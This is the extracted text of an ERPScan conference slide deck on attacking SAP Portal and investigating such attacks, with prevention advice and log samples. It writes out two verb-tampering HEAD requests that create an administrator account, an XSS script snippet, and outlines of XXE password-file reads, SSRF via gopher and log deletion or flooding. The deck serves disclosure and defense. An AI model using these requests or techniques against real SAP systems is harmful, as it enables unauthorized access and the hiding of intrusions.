OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
SAP portal: breaking and forensicating
1. Invest
in
security
to
secure
investments
SAP
Portal:
Hacking
and
forensics
Dmitry
Chastukhin
–
Director
of
SAP
pentest/research
team
Evgeny
Neyolov
–
Security
analyst,
(an@)forensics
research
2. About
ERPScan
• The
only
360-‐degree
SAP
Security
solu=on
-‐
ERPScan
Security
Monitoring
Suite
for
SAP
• Leader
by
the
number
of
acknowledgements
from
SAP
(
150+
)
• 60+
presenta@ons
key
security
conferences
worldwide
• 25
Awards
and
nomina@ons
• Research
team
-‐
20
experts
with
experience
in
different
areas
of
security
• Headquarters
in
Palo
Alto
(US)
and
Amsterdam
(EU)
2
3. Agenda
• SAP
security
• SAP
forensics
WTF?!
• Say
hello
to
SAP
Portal
• Breaking
SAP
Portal
• Catch
me
if
you
can
• Conclusion
3
4. SAP
• The
most
popular
business
applica=on
• More
than
180000
customers
worldwide
• More
than
70%
of
Forbes
500
run
SAP
• More
than
40%
of
ERP
market
in
Poland
4
5. SAP
security
Espionage
• Stealing
financial
informa=on
• Stealing
corporate
secrets
• Stealing
supplier
and
customer
lists
• Stealing
HR
data
Fraud
• False
transac=ons
• Modifica=on
of
master
data
Sabotage
• Denial
of
service
• Modifica=on
of
financial
reports
• Access
to
technology
network
(SCADA)
by
trust
rela=ons
5
7. Is
it
remotely
exploitable?
5000+
non-‐web
SAP
services
exposed
in
the
world
including
Dispatcher,
Message
server,
SapHostControl,
etc.
7
sapscan.com
9. What
about
other
services?
0
1
2
3
4
5
6
7
8
9
SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server
httpd
World
9
10. What
about
unpublished
threats?
• Companies
are
not
interested
in
publishing
informa=on
about
their
breaches
• There
are
a
lot
of
internal
breaches
thanks
to
unnecessarily
given
authoriza=ons
(An
employee
by
mistake
buys
hundreds
of
excavators
instead
of
ten)
• There
are
known
stories
about
backdoors
leb
by
developers
in
custom
ABAP
code
• How
can
you
be
sure
that,
if
a
breach
occurs,
you
can
find
evidence?
10
11. If
there
are
no
acacks,
it
doesn’t
mean
anything
• Companies
don’t
like
to
share
it
• Companies
don’t
use
security
audit
~10%
• Even
if
used,
nobody
manages
it
~5%
• Even
if
managed,
no
correla=on
~1%
SAP
Forensics
11
12. Typical
SAP
audit
op@ons
• ICM
log
icm/HTTP/logging_0
70%
• Security
audit
log
in
ABAP
10%
• Table
access
logging
rec/client
4%
• Message
Server
log
ms/audit
2%
• SAP
Gateway
access
log
2%
*
The
percentage
of
companies
is
based
on
our
security
assessments
and
product
implementa7ons.
12
13. What
do
we
see?
• A
lot
of
research
• Real
acacks
• Lack
of
logging
prac=ce
• Many
vulnerabili=es
are
hard
to
close
→
We
need
to
monitor
them,
at
least
13
14. What
do
we
need
to
monitor?
External
a_acks
on
SAP
14
*
Ideally,
we
should
control
everything,
but
this
talk
has
limits,
so
let’s
focus
on
the
most
cri7cal
areas.
• Awareness
Acack
users
and
SAP
GUI
• Secure configuration and patch
management
SAProuter
• Disable them
Exposed
SAP
services
• Too
much
issues
and
custom
configura=on
• Can
be
0-‐days
• Need
to
concentrate
on
this
area
SAP
Portal
and
WEB
15. • Point
of
web
access
to
SAP
systems
• Point
of
web
access
to
other
corporate
systems
• Way
for
acackers
to
get
access
to
SAP
from
the
Internet
Say
hello
to
Portal
15
17. Okay,
okay.
SAP
Portal
is
important,
and
it
has
many
links
to
other
modules.
So
what?
17
18. SAP
Logging
“If
you
are
running
an
ABAP
+
Java
installa7on
of
Web
AS
with
SAP
Web
Dispatcher
as
a
load
balancing
solu7on,
you
can
safely
disable
logging
of
HTTP
requests
and
responses
on
J2EE
Engine,
and
use
the
corresponding
CLF
logs
of
SAP
Web
Dispatcher.
This
also
improves
the
HTTP
communica7on
performance.
The
only
drawback
of
using
the
Web
Dispatcher’s
CLF
logs
is
that
no
informa4on
is
available
about
the
user
execu4ng
the
request
(since
the
user
is
not
authen7cated
on
the
Web
Dispatcher,
but
on
the
J2EE
Engine
instead).“
SOURCE:
SAP
HELP
*Not
the
only….
There
are
many
complex
aTacks
with
POST
requests.
18
19. SAP
J2EE
Logging
• Categories
of
system
events
recording:
– System
–
all
system
related
security
and
administra=ve
logs
– Applica=ons
–
all
system
events
related
to
business
logic
– Performance
–
reserved
for
single
ac=vity
tracing
• Default
loca=on
of
these
files
in
your
file
system:
usrsap
<sid><id>j2eecluster<node>log
19
20. SAP
J2EE
Logging
• The
developer
trace
files
of
the
Java
instance
<SID><instance name>work
• The
developer
trace
files
of
the
central
services
<SID><instance name>work
<SID><instance name>log
• Java
server
logs
<SID><instance name>j2eeclusterserver<n>log
20
23. SAP
Management
Console
• SAP
MMC:
centralized
system
management
• SAP
MMC
has
remote
commands
• Commands
are
simple
SOAP
requests
• Allowing
to
see
the
trace
and
log
messages
• It’s
not
bad
if
you
only
use
it
some=mes
and
delete
logs
aber
use,
but…
23
24. SAP
Management
Console
24
What
can
we
find
in
logs?
Right!
The
file
userinterface.log
contains
calculated
JSESIONID
But…
The
acacker
must
have
creden=als
to
read
the
log
file
WRONG!
26. Preven@on
26
LINK
to
SAP
HELP
• Don’t
use
TRACE_LEVEL
=
3
• Delete
traces
when
work
is
finished
• Limit
access
to
dangerous
methods
• Install
notes
927637
and
1439348
• Mask
security-‐sensi@ve
data
in
HTTP
access
log
27. Preven@on
27
LINK
to
SAP
HELP
• The
HTTP
Provider
service
can
mask
security-‐
sensi=ve
URL
parameters,
cookies,
or
headers
• By
default,
only
for
the
headers
listed
below
– Path
Parameter:
jsessionid
– Request
Parameters:
j_password,
j_username,
j_sap_password,
j_sap_again,
oldPassword,
confirmNewPassword,=cket
– HTTP
Headers:
Authoriza=on,
Cookie
(JSESSIONID,
MYSAPSSO2)
29. Access
Control
•
Web
Dynpro
-‐
programma=c
•
Portal
iViews
-‐
programma=c
•
J2EE
Web
apps
-‐
declara=ve
29
Programma@c
By
UME
Declara@ve
By
WEB.XML
30. Access
Control
• The
central
en=ty
in
the
J2EE
authoriza=on
model
is
the
security
role
• Programmers
define
the
applica=on-‐specific
roles
in
the
J2EE
deployment
descriptor
30
web.xml
web-‐j2ee-‐engine.xml
32. Verb
Tampering
• If
we
are
trying
to
get
access
to
an
applica=on
using
GET
–
we
need
a
login:pass
and
administrator
role
• What
if
we
try
to
get
access
to
applica=on
using
HEAD
instead
GET?
• PROFIT!
• Did
U
know
about
ctc?
32
33. Verb
Tampering
Need
Admin
account
in
SAP
Portal?
Just
send
two
HEAD
requests
• Create
new
user
CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
CREATEUSER;USERNAME=CONF,PASSWORD=idence
• Add
the
user
CONF
to
the
group
Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
*
Works
when
UME
uses
JAVA
database.
33
34. • Install
SAP
notes
1503579,
1616259,
1589525,
1624450
• Install
other
SAP
notes
about
Verb
Tampering
• Scan
applica=ons
with
ERPScan
WEB.XML
checker
• Disable
the
applica=ons
that
are
not
necessary
Preven@on
34
35. Inves@ga@on
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /
ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /
ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /
ctc/ConfigServlet?
param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=
CONF,PASSWORD=idence HTTP/1.0 200 0
j2eecluster<node>logsystemhttpaccess
responses.trc
35
37. Invoker
Servlet
• Want
to
execute
an
OS
command
on
J2EE
server
remotely?
• Maybe
upload
a
backdoor
in
a
Java
class?
• Or
sniff
all
traffic?
S=ll
remember
ctc?
37
39. Preven@on
39
• Update
to
the
latest
patch
1467771,
1445998
• “EnableInvokerServletGlobally”
must
be
“false”
• Check
all
WEB.XML
files
with
ERPScan
WEBXML
checker
42. XSS
• Many
XSSs
in
Portal
• But
some=mes
HcpOnly
• But
when
we
exploit
XSS,
we
can
use
the
features
of
SAP
Portal
42
EPCF
43. EPCF
• EPCF
provides
a
JavaScript
API
designed
for
the
client-‐side
communica=on
between
portal
components
and
the
portal
core
framework
• Enterprise
Portal
Client
Manager
(EPCM)
• iViews
can
access
the
EPCM
object
from
every
portal
page
or
IFrame
• Every
iView
contains
the
EPCM
object
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person");
</SCRIPT>
43
For
example,
EPCF
used
for
transient
user
data
buffer
for
iViews
46. Web
Dynpro
JAVA
• Web
Dynpro
unauthorized
modifica=ons
• For
example:
– somebody
steals
an
account
using
XSS/CSRF/Sniffing
– then
tries
to
modify
the
severity
level
of
logs
46
48. Inves@ga@on
•
No
traces
of
change
in
default
log
files
clusterserver0logsystemhttpaccessresponses.log
•
Web
Dynpro
sends
all
data
by
POST,
and
we
only
see
GET
URLs
in
responses.log
•
But
some=mes
we
can
find
informa=on
by
indirect
signs
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /
webdynpro/resources/sap.com/
tc~lm~webadmin~log_config~wd/Components/
com.sap.tc.log_configurator.LogConfigurator/
warning.gif HTTP/1.1 200 110
• The
client
loaded
images
from
the
server
during
some
changes
48
49. Inves@ga@on
• Most
ac=ons
have
icons
• They
have
to
be
loaded
from
the
server
• Usually,
legi=mate
users
have
them
all
in
cache
• Acackers
usually
don’t
have
them,
so
they
make
requests
to
the
server
• That’s
how
we
can
iden=fy
poten=ally
malicious
ac=ons
• But
there
should
be
correla=on
with
a
real
user’s
ac=vity
• False
posi=ves
are
possible:
– New
legi=mate
user
– Old
user
clears
cache
– Other
49
54. Breaking
SAP
Portal
• Found
a
file
in
the
OS
of
SAP
Portal
with
the
encrypted
passwords
for
administra=on
and
DB
• Found
a
file
in
the
OS
of
SAP
Portal
with
keys
to
decrypt
passwords
• Found
a
vulnerability
(another
one
;))
which
allows
reading
the
files
with
passwords
and
keys
• Decrypt
passwords
and
log
into
Portal
• PROFIT!
54
55. Read
the
file
How
can
we
read
the
file?
• Directory
Traversal
• OS
Command
execu=on
• XML
External
En=ty
(XXE)
55
56. XXE
in
Portal:
Details
•
Injec=on
of
malicious
requests
into
XML
packets
•
Can
lead
to
unauthorized
file
read,
DoS,
SSRF
•
There
is
an
XXE
vulnerability
in
SAP
Portal
•
Can
be
exploited
by
modifica=on
of
POST
request
•
It
is
possible
to
read
any
file
from
OS
and
much
more
56
60. XXE
in
Portal:
Result
• We
can
read
any
file
• Including
config
with
passwords
• The
SAP
J2EE
Engine
stores
the
database
user
SAP<SID>DB;
its
password
is
here:
usrsap<SID>SYSglobalsecuritydataSecStore.properties
60
68. Inves@ga@on
• The
only
one
way
to
get
HTTP
POST
request
values
is
to
enable
HTTP
Trace
• Visual
Administrator
→
Dispatcher
→
HTTP
Provider
→
Proper=es:
HcpTrace
=
enable
• For
6.4
and
7.0
SP12
and
lower:
– On
Dispatcher:
/j2ee/cluster/dispatcher/log/defaultTrace.trc
– On
Server
j2eeclusterserver0logsystemhttpaccessresponses.0.trc
•
For
7.0
SP13
and
higher:
/j2ee/cluster/dispatcher/log/services/http/req_resp.trc
• Manually
analyze
all
requests
for
XXE
acacks
68
69. Malicious
file
upload:
A_ack
• Knowledge
management
allows
uploading
to
the
server
different
types
of
files
that
can
store
malicious
content
• Some=mes,
if
guest
access
is
allowed,
it
is
possible
to
upload
any
file
without
being
an
authen=cated
user
• For
example,
it
can
be
an
HTML
file
with
JavaScript
that
steals
cookies
69
72. Malicious
file
upload:
Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /
irj/servlet/prt/portal/prteventname/HtmlbEvent/
prtroot/pcd!3aportal_content!2fspecialist!
2fcontentmanager!2fContentManager!
2fcom.sap.km.ContentManager!
2fcom.sap.km.ContentExplorer!
2fcom.sap.km.ContentDocExplorer!
2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200
13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /
irj/go/km/docs/etc/public/mimes/images/html.gif
HTTP/1.1 200 165
*Again,
images
can
help
us.
72
73. Malicious
file
upload:
Preven@on
73
Enable
File
Extension
and
Size
Filter:
• System
Administra7on
→
System
Configura7on
→
Content
Management
→
Repository
→
Filters
→
Show
Advanced
Op7ons
→
File
Extension
and
Size
Filter
• Select
either
the
All
repositories
parameter
or
at
least
one
repository
from
the
repository
list
in
the
Repositories
parameter
74. Malicious
file
upload:
Preven@on
74
Enable
Malicious
Script
Filter:
• System
Administra7on
→
System
Configura7on
→
Content
Management
→
Repository
→
Filters
→
Show
Advanced
Op7ons
→
Malicious
Script
Filter
• The
filter
also
detects
executable
scripts
in
files
that
are
being
modified
and
encodes
them
when
they
are
saved
– enable
Forbidden
Scripts.
Comma-‐separated
list
of
banned
script
tags
that
will
be
encoded
when
the
filter
is
applied
– enable
the
Send
E-‐Mail
to
Administrator
op@on
75. Portal
post-‐exploita@on
• Lot
of
links
to
other
systems
in
corporate
LAN
• Using
SSRF,
acackers
can
get
access
to
these
systems
What
is
SSRF?
75
76. • We
send
Packet
A
to
Service
A
• Service
A
ini=ates
Packet
B
to
service
B
• Services
can
be
on
the
same
or
different
hosts
• We
can
manipulate
some
fields
of
packet
B
within
packet
A
• Various
SSRF
acacks
depend
on
how
many
fields
we
can
control
on
packet
B
76
Packet
A
Packet
B
SSRF
History:
Basics
77. 77
HTTP
Server
Corporate
network
Direct
acack
GET
/vuln.jsp
SSRF
Acack
SSRF
Acack
Get
/vuln.jst
A
B
Par@al
Remote
SSRF:
HTTP
a_acks
on
other
services
78. Gopher
uri
scheme
• Using
gopher://
uri
scheme,
it
is
possible
to
send
TCP
packets
–
Exploit
OS
vulnerabili=es
–
Exploit
old
SAP
applica@on
vulnerabili@es
–
Bypass
SAP
security
restric=ons
–
Exploit
vulnerabili=es
in
local
services
More
info
in
our
BH2012
presenta=on:
SSRF
vs.
Business
Cri7cal
Applica7ons
LINK
78
82. An@-‐forensics
Log
flooding
• 5
ac=ve
logs
• Maximum
log
file
size
is
10
Mb
• Archiving
when
all
logs
reach
the
maximum
size
• If
file.0.log
-‐>
max
size
then
open
file.1.log
• If
file.4.log
-‐>
max
size
then
zip
all
and
backup
• Rewri=ng
the
same
files
aber
archiving
82
83. An@-‐forensics
Log
dele@ng
• SAP
locks
write
access
to
the
only
one
ac=ve
log
• SAP
allows
reading/wri=ng
logs,
so
it
is
possible
to
delete
them
• It
could
compromise
the
acacker’s
presence
Log
changing
• SAP
locks
write
access
only
to
the
one
ac=ve
log
• It
is
possible
to
write
into
any
other
log
file
83
84. Securing
SAP
Portal
• Patching
• Secure
configura=on
• Enabling
HTTP
Trace
with
masking
• Malicious
script
filter
• Log
archiving
• Addi=onal
place
for
log
storage
• Monitoring
of
security
events
– Own
scripts,
parse
common
pacerns
– ERPScan
has
all
exis=ng
web
vulns/0-‐day
pacerns
84
85. It
is
possible
to
protect
yourself
from
these
kinds
of
issues,
and
we
are
working
close
with
SAP
to
keep
customers
secure
SAP
guides
It’s
all
in
your
hands
Regular
security
assessments
ABAP
code
review
Monitoring
technical
security
Segrega@on
of
du@es
85
Conclusion
86. I'd
like
to
thank
SAP's
Product
Security
Response
Team
for
the
great
coopera7on
to
make
SAP
systems
more
secure.
Research
is
always
ongoing,
and
we
can't
share
all
of
it
today.
If
you
want
to
be
the
first
to
see
new
aTacks
and
demos,
follow
us
at
@erpscan
and
aTend
future
presenta7ons:
July
31
–
BlackHat
(Las
Vegas,
USA)
86
Future
work